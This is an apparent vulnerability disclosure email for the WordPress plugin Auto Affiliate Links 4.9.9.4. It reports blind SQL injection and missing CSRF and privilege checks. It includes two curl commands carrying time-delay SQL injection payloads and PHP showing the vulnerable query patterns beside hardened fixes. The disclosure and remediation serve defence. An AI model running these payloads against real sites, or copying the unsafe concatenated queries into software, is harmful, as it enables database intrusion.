Subject: Blind SQL injections in Auto Affiliate Links 4.9.9.4
Date: Wed, 15 Jul 2015 18:43:03 +0200

Hello,

Plugin: Auto Affiliate Links 4.9.9.4 https://wordpress.org/plugins/wp-auto-affiliate-links/

Any authenticated user can inject arbitrary SQL through the first endpoint below (the injection is blind; the verification payloads use a time delay). The second endpoint is reachable only by administrators, but it carries no CSRF protection.


1. SQL injection (wpaal_actions())

Method: POST
Url: http://localhost/wp-admin/admin.php
Vulnerable parameter: aal_massstring

Example PHP callstack:
wpaal_actions   [/wp-auto-affiliate-links/WP-auto-affiliate-links.php:136]
wpdb::query 

Please also note that wpaal_actions() performs no privilege check, so any authenticated user can trigger the actions it exposes (deleting entries, etc.).

Verification:

curl --cookie "..." --data "aal_massactionscheck=1&aal_massstring=1,(SELECT * FROM (SELECT SLEEP(5))X)" http://localhost/wp-admin/admin.php


2. SQL injection (AalLink::showAll()) 

This one is reachable by authenticated administrators only; however, there is no CSRF protection, so an administrator can be made to trigger it from another site.

Method: GET
Url: http://localhost/wp-admin/admin.php?page=aal_topmenu
Vulnerable parameter: aalorder

Example PHP callstack:
wpaal_manage_affiliates   [/wp-auto-affiliate-links/WP-auto-affiliate-links.php:356]
showAll   [/wp-auto-affiliate-links/classes/link.php:29]
wpdb::get_results 

Verification:
curl --cookie "..." "http://localhost/wp-admin/admin.php?page=aal_topmenu&aalorder=1%2C%28SELECT+%2A+FROM+%28SELECT+SLEEP%285%29%29X%29"


3. Other security-related concerns:

The aalImportSettingsAction() function has no CSRF protection, so an attacker can make an administrator upload a settings file of the attacker's choosing and thereby replace the plugin's settings.
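For reference, the following PHP is an added example, not the plugin's own code: it reconstructs the three unsafe patterns described above (a raw ID list concatenated into an IN(...) clause, an ORDER BY built from a GET parameter, and an import handler without a nonce) beside a hardened version of each. The table name aal_links, the column names, the option and form field names, the aaldir parameter and the *_example function names are assumptions made for the illustration.

```php
<?php
// Added example, not code from the Auto Affiliate Links plugin. The table,
// column, option and field names below are hypothetical.

// --- 1. Mass action: no capability check, no nonce, raw ID list in the query ---
function aal_mass_delete_unsafe_example() {
    global $wpdb;
    $table = $wpdb->prefix . 'aal_links'; // hypothetical table name
    // aal_massstring=1,(SELECT * FROM (SELECT SLEEP(5))X) lands verbatim in the IN list.
    $wpdb->query( "DELETE FROM $table WHERE id IN (" . $_POST['aal_massstring'] . ")" );
}

function aal_mass_delete_hardened_example() {
    global $wpdb;
    if ( ! current_user_can( 'manage_options' ) ) {   // privilege check
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'aal_mass_action' );         // CSRF nonce emitted by wp_nonce_field()
    // Cast every list element to an integer; anything non-numeric becomes 0 and is dropped.
    $ids = array_filter( array_map( 'intval', explode( ',', (string) $_POST['aal_massstring'] ) ) );
    if ( empty( $ids ) ) {
        return 0;
    }
    $table        = $wpdb->prefix . 'aal_links';
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    return $wpdb->query( $wpdb->prepare( "DELETE FROM $table WHERE id IN ($placeholders)", $ids ) );
}

// --- 2. Listing: ORDER BY built from the aalorder GET parameter ---
function aal_show_all_unsafe_example() {
    global $wpdb;
    $table = $wpdb->prefix . 'aal_links';
    // ORDER BY cannot be parameterised with prepare(); concatenating it is the bug.
    return $wpdb->get_results( "SELECT * FROM $table ORDER BY " . $_GET['aalorder'] );
}

function aal_show_all_hardened_example() {
    global $wpdb;
    $allowed = array( 'id', 'keyword', 'url' );  // whitelist of sortable columns (hypothetical names)
    $order   = isset( $_GET['aalorder'] ) ? sanitize_key( $_GET['aalorder'] ) : 'id';
    if ( ! in_array( $order, $allowed, true ) ) {
        $order = 'id';                           // unknown column: fall back, never interpolate
    }
    // Sort direction from a hypothetical aaldir parameter, reduced to one of two literals.
    $dir   = ( isset( $_GET['aaldir'] ) && 'desc' === strtolower( $_GET['aaldir'] ) ) ? 'DESC' : 'ASC';
    $table = $wpdb->prefix . 'aal_links';
    return $wpdb->get_results( "SELECT * FROM $table ORDER BY `$order` $dir" );
}

// --- 3. Settings import: require a nonce so a cross-site form cannot trigger it ---
function aal_import_settings_hardened_example() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'aal_import_settings', 'aal_import_nonce' );
    if ( empty( $_FILES['aal_settings_file']['tmp_name'] ) ) {   // hypothetical upload field
        return false;
    }
    $raw  = file_get_contents( $_FILES['aal_settings_file']['tmp_name'] );
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {                                 // reject anything that is not a settings map
        return false;
    }
    return update_option( 'aal_settings', $data );               // hypothetical option name
}
```

The ORDER BY case is the one worth remembering: $wpdb->prepare() only quotes values, so a column name or sort direction has to be reduced to a whitelisted literal before it touches the query string.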


--
Regards,
Marcin Probola